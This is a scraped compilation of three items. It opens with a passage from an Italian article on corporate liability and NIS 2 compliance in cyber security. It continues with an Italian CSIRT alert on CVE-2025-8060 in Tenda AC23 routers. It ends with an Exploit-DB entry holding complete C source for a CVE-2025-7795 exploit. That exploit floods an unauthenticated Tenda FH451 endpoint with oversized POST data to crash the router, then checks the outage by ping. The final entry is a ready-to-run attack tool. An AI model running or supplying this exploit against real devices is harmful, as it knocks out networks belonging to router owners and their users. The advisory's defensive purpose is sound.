aziendali che possano contenere, da sole, il pericolo. E quando l’attacco colpisce, lo fa con una velocità e un effetto moltiplicatore che il mondo della safety non conosce: può paralizzare infrastrutture critiche, bloccare servizi essenziali, compromettere dati strategici o esporre informazioni personali su larga scala. Un singolo evento può generare danni estesi a clienti, fornitori, partner e utenti finali. In questo scenario, quindi la nozione di “colpa di organizzazione”, forse, va completamente ripensata. Non basta più dimostrare di essere conformi a uno standard: serve dimostrare di essere capaci di adattarsi costantemente. Nel campo della sicurezza sul lavoro, l’adeguatezza organizzativa si misura rispetto a standard noti: norme tecniche, prassi consolidate, linee guida settoriali. In ambito cyber, invece, l’adeguatezza è una questione dinamica. Non basta essere in regola oggi: bisogna dimostrare di saper evolvere costantemente, seguendo il ritmo delle minacce e delle tecnologie. Un’organizzazione adeguata, oggi, è quella che sa imparare, adattarsi e migliorare in modo continuo. È quella che costruisce strutture flessibili, capaci di reagire con prontezza e lucidità anche davanti all’inaspettato. Per questo, i criteri di valutazione stanno cambiando. Non si guarda più solo alla conformità formale, ma alla resilienza (tenuta durante la crisi), all’agilità (velocità di adattamento), all’intelligence (capacità di anticipare le minacce), e all’interoperabilità (collaborazione con altri attori per prevenire e contenere gli attacchi). In questo contesto, il ruolo dei consulenti tecnici diventa centrale, e con esso cresce anche l’importanza degli standard internazionali: framework come ISO 27001 e NIST CSF stanno diventando il nuovo metro di valutazione e lo strumento per rispettare obblighi legali fissati da recenti normative unionali come la NIS 2. E questo ha un effetto molto concreto: a me sembra evidente che l’onere della prova tenda a spostarsi. Non sarà più l’accusa a dover dimostrare che l’organizzazione era inadeguata, ma sarà l’ente a dover provare che era allineato agli standard riconosciuti. Tutto ciò sembra avere ricadute profonde anche sul mondo del diritto. Giudici, avvocati, organi di vigilanza, consulenti: tutti probabilmente dovranno cominciare a masticare – almeno in parte – il linguaggio e la logica della cyber security. Non basterà più conoscere le norme. Bisognerà invece capire come funzionano gli attacchi, come si leggono i log, come si riconosce un’anomalia nei sistemi. Serve anche una nuova generazione di esperti capaci di fare da ponte tra diritto e tecnologia. Professionisti in grado di accompagnare le aziende nella costruzione di modelli cyber-compliant, di supportare gli OdV nei controlli e di offrire strumenti concreti per prevenire e gestire incidenti di sicurezza. La colpa di organizzazione non è più solo un concetto giuridico. È diventata uno strumento di lettura della realtà, un metro per valutare se un’azienda sta davvero facendo il possibile per proteggere il proprio patrimonio informativo, i propri utenti, il proprio futuro. Con l’arrivo della Direttiva NIS 2 e del D.Lgs. 138/2024, molte delle pratiche che prima erano facoltative oggi diventano obblighi di legge. E questo cambia lo scenario. Chi lavora con i sistemi 231 si trova a operare in un terreno più definito, con standard più esigenti e con responsabilità che rischiano di diventare oggettive di fatto, anche se non di diritto. Nel prossimo capitolo, si entrerà nel vivo di questa trasformazione, analizzando come le nuove norme stanno riscrivendo il concetto stesso di responsabilità organizzativa nel mondo digitale, e cosa significa, oggi, costruire un modello davvero efficace per prevenire i reati informatici.
cybersecurity360.itAug 22, 2025extracted
Tenda: PoC pubblico per lo sfruttamento di CVE nei router AC23
Tenda: PoC pubblico per lo sfruttamento di CVE nei router AC23 Alert AL04/250723/CSIRT-ITA Sintesi Disponibile un Proof of Concept (PoC) per lo sfruttamento della CVE-2025-8060 che interessa i router AC23 di Tenda. Tale vulnerabilità potrebbe permettere ad un utente malevolo l'esecuzione di codice da remoto sui dispositivi target. Tipologia Remote Code Execution Descrizione e potenziali impatti È stato recentemente rilevato un Proof of Concept (PoC) per lo sfruttamento della CVE-2025-8060 - di tipo “Stack-Based Buffer Overflow” e con score CVSS v3.x pari a 8.8 - relativa ai router AC23 di Tenda. Tale vulnerabilità riguarda la funzione sub_46C940 del file /goform/setMacFilterCfg della componente httpd che gestisce la configurazione del filtro MAC attraverso l’interfaccia di amministrazione web: la manipolazione del parametro deviceList con parametri opportunamente predisposti potrebbe permettere l'esecuzione di codice da remoto sui dispositivi target. Prodotti e/o versioni affette Tenda, router AC23 versione 16.03.07.52 Azioni di mitigazione Si evidenzia che per i prodotti elencati il vendor non rilascerà alcuna patch considerata la relativa data di fine supporto (EOL). Pertanto si raccomanda di valutare la sostituzione del dispositivo con una versione supportata. Ove tale operazione non sia tempestivamente percorribile, si raccomanda di isolare i dispositivi interessati: disattivando la funzionalità MAC filter via web o UI; limitando l’accesso all’interfaccia di gestione da reti non fidate o da Internet pubblica.
acn.gov.itJul 23, 2025extracted
[remote] Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow
/* * Title : Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow * Author : Byte Reaper * Telegram : @ByteReaper0 * CVE : CVE-2025-7795 * Vulnerability : Buffer Overflow * Description : * A buffer overflow vulnerability affecting certain Tenda routers, * exploitable via an unauthenticated POST request to an unprotected endpoint, leading to service crash. */ #include #include #include #include "argparse.h" #include #include #include #include #define FULL_URL 2500 #define POST_DATA 10000 const char *targetUrl = NULL; const char *targetip = NULL; int selectIp = 0; int selectUrl = 0; int verbose = 0; int showOne = 0; char postData[POST_DATA]; struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (!tmp) return 0; m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } void pingPacket() { int pid = fork(); printf("\n============================================== [Ping] ==============================================\n"); if (pid PID: %d\e[0m\n", getpid()); char *const argv[] = { "/bin/ping", "-c", "3", (char *)targetip, NULL }; char *const envp[] = { NULL }; asm volatile ( "mov $59, %%rax\n\t" "mov %[prog], %%rdi\n\t" "mov %[argv], %%rsi\n\t" "mov %[envp], %%rdx\n\t" "syscall\n\t" "mov $60, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : [prog] "r" (argv[0]), [argv] "r" (argv), [envp] "r" (envp) : "rax", "rdi", "rsi", "rdx" ); } else { printf("\e[1;32m[+] Main PID : %d\e[0m\n", getpid()); int status; waitpid(pid, &status, 0); if (WIFEXITED(status)) { int code = WEXITSTATUS(status); printf("\e[1;33m[+] Ping exited with code: %d\e[0m\n", code); if (code == 0) { printf("\e[1;31m[-] Successfully confirmed connection via ping!\e[0m\n"); printf("\e[1;31m[-] The server is still working, please try again!\n\e[0m"); } else { printf("\e[1;34m[+] The server is not responding to the ping request!\e[0m\n"); printf("\e[1;34m[+] CVE-2025-7795: Vulnerability confirmed! Server is down.\e[0m\n"); } } } printf("\n============================================================================================\e[0m\n"); } void sendRequest() { CURL *c = curl_easy_init(); CURLcode res; char full[FULL_URL]; struct Mem response = {NULL, 0}; if (!c) { printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n"); exit(EXIT_FAILURE); } if (targetip) selectIp = 1; if (targetUrl) selectUrl = 1; if (selectIp) { snprintf(full, sizeof(full), "http://%s/goform/fromP2pListFilter", targetip); } if (selectUrl) { snprintf(full, sizeof(full), "%s/goform/fromP2pListFilter", targetUrl); } int rounds = 5; int baseLen = 3500, step = 1000; showOne = 1; for (int i = 0; i = sizeof(postData)) break; snprintf(postData, sizeof(postData), "list="); memset(postData + 5, 'A', len); postData[5 + len] = '\0'; printf("\e[1;34m[%d] Iteration %d - Length: %d\e[0m\n", i+1, i+1, len); if (verbose) { printf("\e[1;35m\n====================================================================[Post Data] ====================================================================\e[0m\n"); printf("%s\e[0m\n\n", postData); printf("\e[1;35m====================================================================[Post Data] ====================================================================\e[0m\n"); } curl_easy_reset(c); curl_easy_setopt(c, CURLOPT_URL, full); curl_easy_setopt(c, CURLOPT_ACCEPT_ENCODING, ""); curl_easy_setopt(c, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(c, CURLOPT_POST, 1L); curl_easy_setopt(c, CURLOPT_POSTFIELDS, postData); curl_easy_setopt(c, CURLOPT_POSTFIELDSIZE, (long)strlen(postData)); curl_easy_setopt(c, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(c, CURLOPT_WRITEDATA, &response); curl_easy_setopt(c, CURLOPT_CONNECTTIMEOUT, 5L); curl_easy_setopt(c, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(c, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(c, CURLOPT_SSL_VERIFYHOST, 0L); struct curl_slist *h = NULL; h = curl_slist_append(h, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"); h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br"); h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5"); h = curl_slist_append(h, "Connection: keep-alive"); h = curl_slist_append(h, "Referer: http://example.com"); h = curl_slist_append(h, "Cache-Control: no-cache"); h = curl_slist_append(h, "Pragma: no-cache"); curl_easy_setopt(c, CURLOPT_HTTPHEADER, h); if (verbose) curl_easy_setopt(c, CURLOPT_VERBOSE, 1L); char *encode1 = curl_easy_escape(c, full, 0); if (!encode1) { printf("\e[1;31m[-] URL encoding failed for payload\e[0m\n"); exit(EXIT_FAILURE); } if (verbose && showOne) { printf("\e[1;37m========================================="); if (selectUrl) printf("\e[1;37m[+] Input Url : %s\e[0m\n[+] Encode Url : %s\e[0m\n[+] full format Url : %s\e[0m\n", targetUrl, encode1, full); if (selectIp) printf("\e[1;37m[+] Input Ip : %s\e[0m\n[+] full format Url : %s\e[0m\n", targetip, full); printf("========================================="); showOne = 0; } res = curl_easy_perform(c); curl_slist_free_all(h); curl_free(encode1); if (response.buffer) { free(response.buffer); response.buffer = NULL; response.len = 0; } if (res == CURLE_OK) { long httpCode = 0; printf("\e[1;36m[+] Request sent successfully\e[0m\n"); curl_easy_getinfo(c, CURLINFO_RESPONSE_CODE, &httpCode); printf("\e[1;32m[+] Http Code Response : %ld\e[0m\n", httpCode); if (httpCode >= 200 && httpCode < 300) { printf("\e[1;31m[-] The server was not affected, still working !\n"); printf("\e[1;33m-------------------------------- Response Server --------------------------------\e[0m\n"); printf("%s\e[0m\n", response.buffer); printf("\e[1;33m-----------------------------------------------------------------------------------\e[0m\n"); } else { printf("\e[1;34m[+] Negative server response. I started trying to confirm the connection...\e[0m\n"); printf("[+] Run Command Ping For Check Connection : \e[0m\n"); if (selectIp) pingPacket(); else printf("[-] Error Run Command Ping for URl !\e[0m\n[-] Please Enter Target Ip for Check Connection !\e[0m\n"); } } else { printf("[-] Error Send Request, Please Check Your Connection !\e[0m\n"); printf("[-] Error : %s\n", curl_easy_strerror(res)); } } free(response.buffer); curl_easy_cleanup(c); } int main(int argc, const char **argv) { printf( "\e[1;31m" "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖ \n" "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌ ▌▙▌▙▖ \n" "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌ ▌▄▌▄▌ \n" " \e[1;37mByte Reaper\e[0m\n" ); printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------\e[0m\n"); if (getuid() != 0) { printf("===================================================\e[0m\n"); printf("[-] Not running as root. Trying with sudo...\e[0m\n"); char *args[] = {(char*)"sudo", (char*)"./exploit", NULL}; execvp("sudo", args); perror("[-] Error Run Exploit in Root !"); asm volatile ( "mov $0x3C, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : : "rdi" ); } printf("\e[1;36m[+] Running as root! Exploit continues...\e[0m\n"); printf("===================================================\e[0m\n"); struct argparse_option options[] = { OPT_HELP(), OPT_STRING('i', "ip", &targetip, "Enter Target IP"), OPT_STRING('u', "url", &targetUrl, "Enter Target URL"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (!targetip && !targetUrl) { printf("\e[1;33m[-] Please Enter Target IP OR URl !\e[0m\n"); printf("\e[1;33m[!] Exemple : ./exploit -u http://ROUTER_IP\e[0m\n"); printf("[+] OR \n"); printf("\e[1;33m[!] Exemple : ./exploit -i ROUTER_IP\e[0m\n"); asm volatile( "xor %%rdi, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "1:\n\t" "syscall\n\t" : : : "rax", "rdi", "rsi" ); } if (targetip && targetUrl) { printf("[+] Please Enter Traget URL OR Traget Ip address, Exit...\e[0m\n"); asm volatile ( "mov $0x3C, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : :"rdi" ); } if (selectIp) { sendRequest(); } else { sendRequest(); } return 0; }
exploit-db.comJul 22, 2025extracted